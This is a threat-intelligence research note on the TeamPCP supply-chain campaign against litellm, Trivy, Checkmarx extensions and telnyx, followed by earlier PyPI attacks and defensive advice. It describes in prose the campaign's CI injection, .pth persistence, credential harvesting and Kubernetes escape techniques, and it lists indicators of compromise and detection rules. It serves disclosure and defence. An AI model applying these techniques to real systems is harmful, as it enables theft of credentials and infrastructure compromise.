TeamPCP and the Cascading AI/ML Supply Chain Campaign

Authors: Cloud Security Alliance AI Safety Initiative
Published: 2026-03-29

Categories: AI Infrastructure Security, Supply Chain Security, Threat Intelligence
Download PDF

TeamPCP and the Cascading AI/ML Supply Chain Campaign

Key Takeaways

  • The TeamPCP threat group executed a cascading supply chain campaign in March 2026 that compromised the Trivy security scanner, two Checkmarx IDE extensions, the litellm PyPI package (~97 million monthly downloads), and the telnyx SDK within an eight-day window — demonstrating that one compromised tool can be weaponized to harvest credentials that unlock the next target in the chain [1][2][3].
  • The litellm package, which aggregates API credentials for over 100 large language model providers including OpenAI and Anthropic, was poisoned with a multi-stage credential stealer that auto-executed on every Python interpreter startup via a .pth file injection, requiring no explicit import statement from victim code [4][5].
  • Open source malicious packages grew 188% year-over-year in Q2 2025, with data exfiltration identified as the primary objective in 55% of detected malicious packages [6].
  • ML model files in Pickle format (.pkl, .pt, .bin) represent a structural blind spot for standard software composition analysis tooling; attackers are actively exploiting this gap to embed malicious payloads in fake AI SDK packages [7][8].
  • Threat intelligence reporting indicates that AI API credentials — keys for OpenAI, Anthropic, AWS Bedrock, and Google Vertex AI — have established direct monetization pathways in underground markets [4][15], making AI developer environments a high-priority target for credential-focused campaigns independent of the tradecraft sophistication required to exploit them.

Background

The Python Package Index (PyPI) is the primary distribution channel for the AI/ML software ecosystem. Foundational frameworks including PyTorch, Hugging Face Transformers, LangChain, LiteLLM, and the official SDKs for every major commercial LLM provider are distributed through PyPI, and virtually every AI developer environment has a dependency graph rooted in it. This centrality has made PyPI an attractive target for threat actors seeking access to the AI infrastructure layer.

The supply chain threat to PyPI is not new, but its character has shifted materially in the period from late 2024 through the first quarter of 2026. Earlier campaigns appear to have been largely opportunistic, based on their reliance on typosquatting rather than direct pipeline compromise: individual actors registering package names designed to catch developers who mistyped a legitimate dependency. The more recent campaigns documented in this note represent a structural shift in adversary methodology — from opportunistic typosquatting to deliberate pipeline compromise of trusted packages. Sophisticated threat groups — including nation-state actors and organized criminal enterprises — have developed techniques for compromising the build and release pipelines of legitimate, widely trusted packages rather than relying on confusion or carelessness to achieve initial access. Once inside a trusted package, the scale of a modern AI library’s download footprint transforms a single compromise into a platform-wide incident.

The attack surface is amplified by architectural properties specific to AI middleware. Packages like LiteLLM, LangChain, and similar orchestration libraries are provisioned with credentials for every downstream service they connect to: LLM provider API keys, cloud platform credentials, database connection strings, and CI/CD secrets. This makes the middleware layer a credential aggregation point whose compromise yields access far beyond the immediate host. The same logic applies to AI workflow orchestrators such as Langflow, discussed in a companion CSA research note published on the same date as this document. The credential aggregation pattern is a category-level risk, not a product-specific vulnerability.

Sonatype’s Q2 2025 data identified 845,204 cumulative malicious open source packages ever discovered, with 16,279 new packages identified in Q2 2025 alone [6]. The trajectory illustrates that the problem is not declining as awareness grows; the economics of targeting high-value AI credential stores are accelerating adversary investment in the space.


Security Analysis

TeamPCP: Cascading Compromise as an Attack Methodology

The TeamPCP group’s March 2026 campaign is among the most technically elaborate supply chain operations targeting the AI ecosystem, distinguished by its cascading structure: rather than mounting parallel independent attacks, TeamPCP used the compromise of one trusted tool to harvest the credentials necessary to compromise the next, creating a chain in which each link extends their access further into the AI developer toolchain.

The chain began on March 19, 2026, when TeamPCP exploited unsanitized GitHub Actions workflows in Trivy, Aqua Security’s widely used open-source container vulnerability scanner. Trivy’s release pipeline allowed user-controlled input — specifically, branch names — to reach execution contexts within the workflow without sanitization. This class of vulnerability, sometimes described as a “pwn request,” allows an external contributor to trigger arbitrary code execution inside a repository’s CI/CD environment simply by opening a pull request with a crafted branch name. Researchers estimated that thousands of CI/CD pipelines that ran Trivy as part of routine security scans during this window executed attacker-controlled code [3][9].

Using credentials harvested from Trivy’s pipeline compromise, TeamPCP accessed the GitHub account of a LiteLLM co-founder on March 23, 2026, and also compromised two Checkmarx IDE extensions distributed through OpenVSX: ast-results version 2.53 (approximately 36,000 downloads) and cx-dev-assist version 1.7.0 (approximately 500 downloads) [2]. On March 24, the group published poisoned versions of litellm — specifically versions 1.82.7 and 1.82.8 — to PyPI. Both versions remained live for approximately two to three hours before PyPI’s security team removed them [4][5]. On March 27, TeamPCP published two malicious versions of the telnyx SDK (versions 4.87.1 and 4.87.2, a package with approximately 3.75 million total downloads) using a novel delivery mechanism: the malicious payload was embedded in a WAV audio file with XOR-encrypted content concealed within audio frames — a steganographic technique that evades tools inspecting only source code and binary files [1][10].

Technical Profile of the LiteLLM Malware

The malware embedded in litellm 1.82.8 illustrates the degree to which supply chain attackers have tailored their tooling to the specific properties of AI infrastructure. At the persistence layer, the malware installed a .pth file — litellm_init.pth — into the Python environment’s site-packages directory. Python’s site module processes .pth files automatically during interpreter initialization, meaning the malicious payload executed on every Python invocation regardless of whether any application code imported litellm [4][5]. This persistence mechanism is significant because it defeats the common assumption that uninstalling a malicious package removes its effects; a .pth file placed during installation continues to execute even after the package itself has been removed.

The payload’s exfiltration targets reflected an explicit focus on AI infrastructure credentials. The multi-stage collection pipeline gathered LLM provider API keys (OpenAI, Anthropic, Cohere, and others) from environment variables and configuration files, cloud platform credentials for AWS, GCP, and Azure, Kubernetes service account tokens, Docker configurations, CI/CD pipeline secrets, shell history, SSH keys, database credentials, and cryptocurrency wallet files [4]. Collected material was AES-256 encrypted with an RSA-4096 wrapped session key before transmission to the command-and-control domain models.litellm[.]cloud, a domain constructed to resemble LiteLLM’s legitimate infrastructure. Exfiltrated archives were delivered with the header X-Filename: tpcp.tar.gz, an artifact that provides a detection opportunity for network monitoring tools [4][5].

When a usable Kubernetes service account token was present, the malware attempted lateral movement by creating privileged pods with names matching the pattern node-setup-* that mounted the host root filesystem, enabling full node escape from containerized environments [4]. For systems with Iranian IP geolocation, a destructive kamikaze payload was delivered that wiped filesystems; all other systems received a persistent host-provisioner-std backdoor [4]. The geofencing behavior suggests the group was operating under constraints intended to limit collateral damage within a specific jurisdiction, though IP geolocation alone is an unreliable attribution signal and should be weighed accordingly.

The AI Middleware Aggregation Problem

LiteLLM’s role in the campaign is not incidental. The package was selected because its function — acting as a universal proxy between applications and over 100 LLM provider APIs — requires it to hold credentials for every provider its deploying organization uses. A single LiteLLM instance in a production environment may simultaneously hold API keys for OpenAI, Anthropic, AWS Bedrock, Google Vertex AI, and a half-dozen additional providers, alongside the cloud credentials for the infrastructure on which it runs. Downstream users of LiteLLM at the time of the attack included Netflix, Stripe, Google, CrewAI, DSPy, and MLflow [1][2]. The 97 million monthly downloads illustrate the scale of potential exposure: among those users, every organization running LiteLLM in a production environment with configured provider credentials was at risk of credential exfiltration.

This aggregation pattern — one middleware package holding credentials for an entire organization’s AI stack — is structurally shared by LangChain, AutoGen, similar orchestration frameworks, and the LLM-as-a-service APIs they connect to. The attack on LiteLLM is properly read as a proof of concept for a category of attack, not solely as a campaign against a specific package. Organizations evaluating their AI supply chain risk should map the credential dependencies of every AI middleware component in their environment.

Earlier Campaigns in the Attack Series

The TeamPCP campaign emerged from a broader pattern of supply chain attacks against AI/ML Python packages that intensified through 2024 and 2025.

In December 2024, the ultralytics package — the YOLO computer vision library with 61 million downloads and 33,700 GitHub stars — was backdoored to deliver an XMRig Monero cryptominer targeting GPU compute [11][12]. The attack method was identical in structure to TeamPCP’s approach: a “pwn request” exploiting unsanitized GitHub Actions workflows in the package’s release pipeline. Four versions (8.3.41, 8.3.42, 8.3.45, and 8.3.46) were affected. The real-world signal of the attack’s success came from Google Colab, whose automated abuse-detection systems began banning users who had imported the library — a consequence of GPU resources on Colab’s infrastructure being redirected to mining operations [11][13]. The Ultralytics incident produced a detailed post-mortem from the Python Software Foundation and PyPI that informed subsequent hardening efforts.

North Korea’s Lazarus Group has maintained a sustained presence in PyPI and npm targeting AI and developer tool packages under the campaign codenamed “Graphalgo.” Sonatype attributed 234 unique malware packages to Lazarus in just the first half of 2025, with over 30,050 downloads across PyPI and npm [15][14]. The group’s preferred distribution mechanism is a versioned bait-and-switch: an initial benign package version accumulates genuine downloads and positive reputation, after which a subsequent version containing the malicious payload is published. This technique defeats reputation-based package selection, where developers choose packages by download count, since the accumulated count was earned legitimately. Lazarus campaigns have specifically targeted AI research environments, likely for state-level intelligence gathering on AI model development and training data [14].

In May 2025, three packages impersonating Alibaba Cloud AI Labs SDKs were discovered on PyPI. These packages exploited a structural gap in standard software composition analysis tooling: rather than embedding malicious code in Python source files where SCA scanners would detect it, the packages loaded malicious PyTorch model files stored in Pickle format through their __init__.py initialization routines [7][8]. Security tools at the time of discovery did not scan the contents of ML model files (.pkl, .pt, .bin) for executable payloads, making the malicious payload undetectable to SCA tools focused on source and binary analysis. Malicious code executed upon model deserialization exfiltrated system and network configuration to attacker-controlled servers [7].

Two packages discovered in November 2023 but active for over a year — gptplus (impersonating the OpenAI SDK) and claudeai-eng (impersonating Anthropic’s Claude SDK) — accumulated 1,700 downloads across the United States, China, France, Germany, and Russia before detection [16]. Both packages provided partial legitimate functionality — scraping LLM responses through proxy interfaces — to reduce the likelihood of user-initiated removal, while simultaneously delivering the JarkaStealer malware variant, which performed browser credential theft, session token exfiltration from Telegram, Discord, and Steam, system screenshots, and comprehensive system profiling [16][17].

Slopsquatting: The Emerging Pre-Attack Surface

Beyond the active campaigns, a structural vulnerability in how AI-assisted development generates dependency lists creates a new pre-attack surface. Research published at USENIX Security 2025 documented that large language models hallucinate plausible-sounding but nonexistent package names in approximately 19.7% of package suggestions [18]. The practice of registering hallucinated package names — described as “slopsquatting” — allows adversaries to establish malicious packages at names that AI coding assistants will suggest, before any developer thinks to check whether those names are already registered. As LLM-assisted development becomes increasingly common among AI and Python developers, the slopsquatting attack surface is likely to expand as this practice scales.


Recommendations

Immediate Actions

Organizations using Python-based AI infrastructure should audit their environments for evidence of TeamPCP’s known indicators of compromise. Specifically, security teams should search for the presence of .pth files in site-packages directories — particularly litellm_init.pth or analogous files not traceable to legitimate package installations — and examine currently installed versions of litellm and telnyx to confirm they are not running one of the identified malicious versions (litellm 1.82.7, 1.82.8; telnyx 4.87.1, 4.87.2). Any environment that ran these versions should treat all credentials present in that environment as compromised and initiate credential rotation across all LLM provider APIs, cloud platform credentials, Kubernetes service accounts, database connections, and CI/CD pipeline secrets.

Organizations using the Checkmarx ast-results or cx-dev-assist IDE extensions should verify they are not running the compromised versions (2.53 and 1.7.0 respectively) and review developer workstations that had these extensions installed for signs of credential exfiltration to checkmarx[.]zone [2].

Detection teams should add network monitoring rules for outbound traffic to models.litellm[.]cloud and HTTP transfers carrying the header X-Filename: tpcp.tar.gz, and should search system logs for process creation events associated with ~/.config/sysmon/sysmon.py and systemd user units created by packages [4][5]. Kubernetes environments should audit for pods matching the node-setup-* naming pattern and review any recently created privileged pod definitions for unexpected host path mounts.

Short-Term Mitigations

The most structurally impactful mitigation for the class of attack demonstrated by TeamPCP against both Trivy and Ultralytics is the adoption of OIDC-based Trusted Publishers for all internal and maintained PyPI packages. Trusted Publishers eliminate the long-lived API tokens that attackers harvested from pipeline environments; by coupling publish rights to ephemeral, identity-bound OIDC tokens, the credential chain that enabled TeamPCP’s cascading compromise is broken [13]. PyPI had enrolled over 50,000 projects in Trusted Publishers by the end of 2025, but adoption remains incomplete across the ecosystem [19]. All organizations that maintain Python packages should prioritize this migration.

For packages consumed from PyPI, version pinning with cryptographic hash verification — using pip install --require-hashes or equivalent mechanisms in pip-compile generated requirements files — prevents the installation of packages modified after the version was published, a control that would likely have detected the TeamPCP LiteLLM compromise if organizations had hash-pinned their dependency trees [5]. Hash pinning is effective only when combined with a process for reviewing and approving dependency updates, since a pinned dependency that is never updated still carries its own risk profile.

CI/CD pipelines that invoke third-party tools as part of build or security scanning workflows should pin those tools to explicit SHA-based references rather than floating version tags. The Trivy compromise was enabled by GitHub Actions workflows that fetched tool versions by tag rather than commit hash; pinning @latest or a version tag provides no protection against tag reassignment by an attacker who has compromised the upstream repository. SHA-pinned Actions are resilient to this class of attack; because a SHA references an immutable object, an attacker who reassigns a version tag cannot redirect pipelines that reference the hash directly [3][9].

The .pth file persistence mechanism used by the LiteLLM malware represents an undermonitored attack surface in Python environments. Security teams should implement file integrity monitoring for Python site-packages directories, with alerting on the creation of new .pth files. In containerized or serverless environments where base images are rebuilt on each deployment, this control is provided naturally by immutable infrastructure patterns.

Strategic Considerations

Organizations with significant AI infrastructure should conduct a credential dependency mapping exercise that documents which packages and services hold credentials for which downstream systems. The goal of this exercise is to identify the packages whose compromise would yield the broadest lateral movement capability — the packages most analogous to LiteLLM’s position in the TeamPCP campaign — and apply additional scrutiny to their dependency management, upgrade cadence, and runtime monitoring. For packages at the apex of an organization’s credential dependency graph, the acceptable threshold for verification before deployment should be higher than for packages with narrow access.

The Pickle-based model poisoning technique documented in the May 2025 Alibaba AI SDK campaign underscores that standard SCA tooling is not sufficient for AI/ML environments. Organizations consuming pre-trained models, fine-tuned weights, or third-party model artifacts should adopt the safetensors format wherever possible, as it prohibits arbitrary code execution during deserialization by design [7][8]. For environments where Pickle-format models cannot be immediately replaced, dedicated scanning tools capable of static analysis of serialized model files should be evaluated and deployed as a compensating control. This is a genuinely new category of tooling requirement that has no equivalent in traditional application security programs.

Private package mirrors with allowlisting represent the most robust architectural control for production AI infrastructure. An environment that installs only from an internally vetted mirror eliminates exposure to new PyPI-based attacks as an initial distribution vector, substantially reducing the attack surface documented in this note. The mirror’s vetting process and update pipeline become the new trust boundary and must be secured accordingly. For organizations with significant production AI infrastructure, the risk reduction of a private mirror typically justifies the operational investment; smaller teams may find repository firewall tools a more proportionate starting point. Tools such as Sonatype Firewall or Socket provide automated behavioral analysis of packages as they are requested, blocking malicious versions before they reach developer or production environments [6][20].

Finally, AI developer workflows that incorporate LLM-assisted coding should establish a practice of verifying suggested package names against PyPI before installation. Given the 19.7% hallucination rate documented for package name suggestions, development teams should treat any unfamiliar package name generated by a coding assistant as unverified until confirmed against the actual PyPI registry [18]. This check takes seconds and eliminates the risk of slopsquatting attacks that preemptively occupy hallucinated package names.


CSA Resource Alignment

The attack patterns documented in this note map to several threat layers and control domains within the CSA AI safety and cloud security frameworks.

The MAESTRO framework for agentic AI threat modeling identifies the AI/ML pipeline as a primary attack surface (Layer 2: Data Operations) and the tool and integration ecosystem as a distinct threat layer (Layer 5: External Integrations). TeamPCP’s strategy of targeting middleware packages that aggregate credentials across multiple LLM providers is a direct exploitation of the Layer 5 trust relationships that agentic AI architectures depend on. MAESTRO’s guidance on supply chain integrity for model artifacts and tools is directly applicable to the controls described in this note.

The AI Controls Matrix (AICM) provides a framework for evaluating supply chain risk controls in AI environments. Relevant control domains include those governing third-party dependency management, artifact integrity verification, and runtime environment monitoring. The AICM’s emphasis on continuous supply chain monitoring is validated by the speed of this campaign: the window between malicious package publication and removal was measured in hours, not days, making continuous monitoring tools — rather than periodic auditing — the appropriate control class.

The CSA AI Organizational Responsibilities series addresses the governance dimension of AI supply chain risk, including the responsibilities of security, development, and procurement functions in evaluating the risk profile of AI middleware components. The credential aggregation pattern exploited by TeamPCP highlights a governance gap that many organizations have yet to close: documenting and monitoring which packages hold credentials for which downstream systems. Organizations that had inventoried the credentials held by their AI orchestration layer would have been in a stronger position to scope the impact of the compromise and prioritize their response.

CSA’s Zero Trust guidance is directly applicable to the Kubernetes lateral movement capability demonstrated by the LiteLLM malware. Zero Trust principles — specifically workload identity, least-privilege service account permissions, and pod security admission controls — would have constrained the blast radius of a successful compromise even when initial access to the Python environment was achieved. A Kubernetes cluster configured with the principle of least privilege, where service accounts hold only the permissions required for their specific workload, is significantly more resilient to the node-setup-* privileged pod creation technique than a cluster with permissive RBAC configurations.

The CCM’s Supply Chain Management and Transparency (STA) domain, including STA-01 through STA-09, provides concrete control requirements for organizations seeking to formalize their approach to open source dependency risk. While the CCM was designed primarily for cloud service provider relationships, its STA controls are broadly applicable to the package dependency relationships that define modern AI software stacks.


References

  1. Help Net Security, “LiteLLM PyPI packages compromised in expanding TeamPCP supply chain attacks,” March 25, 2026, https://www.helpnetsecurity.com/2026/03/25/teampcp-supply-chain-attacks/
  2. Wiz, “Three’s a Crowd: TeamPCP Trojanizes LiteLLM in Continuation of Campaign,” March 2026, https://www.wiz.io/blog/threes-a-crowd-teampcp-trojanizes-litellm-in-continuation-of-campaign
  3. SANS Institute, “When a Security Scanner Became a Weapon: Inside the TeamPCP Supply Chain Campaign,” March 2026, https://www.sans.org/blog/when-security-scanner-became-weapon-inside-teampcp-supply-chain-campaign
  4. Datadog Security Labs, “LiteLLM and Telnyx Compromised on PyPI: Tracing the TeamPCP Supply Chain Campaign,” March 2026, https://securitylabs.datadoghq.com/articles/litellm-compromised-pypi-teampcp-supply-chain-campaign/
  5. Sonatype, “Compromised litellm PyPI Package Delivers Multi-Stage Credential Stealer,” March 2026, https://www.sonatype.com/blog/compromised-litellm-pypi-package-delivers-multi-stage-credential-stealer
  6. Sonatype, “Open Source Malware Index Q2 2025,” July 2025, https://www.sonatype.com/blog/open-source-malware-index-q2-2025
  7. ReversingLabs, “Malicious Attack Method on Hosted ML Models Now Targets PyPI,” May 2025, https://www.reversinglabs.com/blog/malicious-attack-method-on-hosted-ml-models-now-targets-pypi
  8. CSO Online, “Poisoned Models in Fake Alibaba SDKs Show Challenges of Securing AI Supply Chains,” May 2025, https://www.csoonline.com/article/3998351/poisoned-models-hidden-in-fake-alibaba-sdks-show-challenges-of-securing-ai-supply-chains.html
  9. Snyk, “How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM,” March 2026, https://snyk.io/articles/poisoned-security-scanner-backdooring-litellm/
  10. Infosecurity Magazine, “TeamPCP Targets Telnyx Package in Latest PyPI Software Supply Chain Attack,” March 2026, https://www.infosecurity-magazine.com/news/teampcp-targets-telnyx-pypi-package/
  11. Bleeping Computer, “Ultralytics AI Model Hijacked to Infect Thousands with Cryptominer,” December 2024, https://www.bleepingcomputer.com/news/security/ultralytics-ai-model-hijacked-to-infect-thousands-with-cryptominer/
  12. ReversingLabs, “Compromised Ultralytics PyPI Package Delivers Crypto Coinminer,” December 2024, https://www.reversinglabs.com/blog/compromised-ultralytics-pypi-package-delivers-crypto-coinminer
  13. Python Package Index Blog, “Supply-Chain Attack Analysis: Ultralytics,” December 11, 2024, https://blog.pypi.org/posts/2024-12-11-ultralytics-attack-analysis/
  14. The Hacker News, “Lazarus Campaign Plants Malicious Packages in npm and PyPI Ecosystems,” February 2026, https://thehackernews.com/2026/02/lazarus-campaign-plants-malicious.html
  15. Sonatype, “How North Korea-Backed Lazarus Group Is Weaponizing Open Source,” 2025, https://www.sonatype.com/resources/whitepapers/how-lazarus-group-is-weaponizing-open-source
  16. Kaspersky, “Kaspersky Uncovers Year-Long PyPI Supply Chain Attack Using AI Chatbot Tools as Lure,” 2024, https://www.kaspersky.com/about/press-releases/kaspersky-uncovers-year-long-pypi-supply-chain-attack-using-ai-chatbot-tools-as-lure
  17. Snyk Labs, “Malware in LLM Python Package Supply Chains,” 2025, https://labs.snyk.io/resources/malware-in-llm-python-package-supply-chains/
  18. Joseph Spracklen, Raveen Wijewickrama, A.H.M. Nazmus Sakib, Anindya Maiti, Bimal Viswanath, Murtuza Jadliwala, “We Have a Package for You! A Comprehensive Analysis of Package Hallucinations by Code Generating LLMs,” USENIX Security Symposium 2025, https://www.usenix.org/system/files/conference/usenixsecurity25/sec25cycle1-prepub-742-spracklen.pdf (DOI: https://doi.org/10.5281/zenodo.14676377; see also: https://nesbitt.io/2025/12/10/slopsquatting-meets-dependency-confusion.html)
  19. PyPI, “2025 Year in Review,” January 2026, https://blog.pypi.org/posts/2025-12-31-pypi-2025-in-review/
  20. Socket, “Supply Chain Attack Detection for Python and JavaScript Packages,” https://socket.dev/
← Back to Research Index